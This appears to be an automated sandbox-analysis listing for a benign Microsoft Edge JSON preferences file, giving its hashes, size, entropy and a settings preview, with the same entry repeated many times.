                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
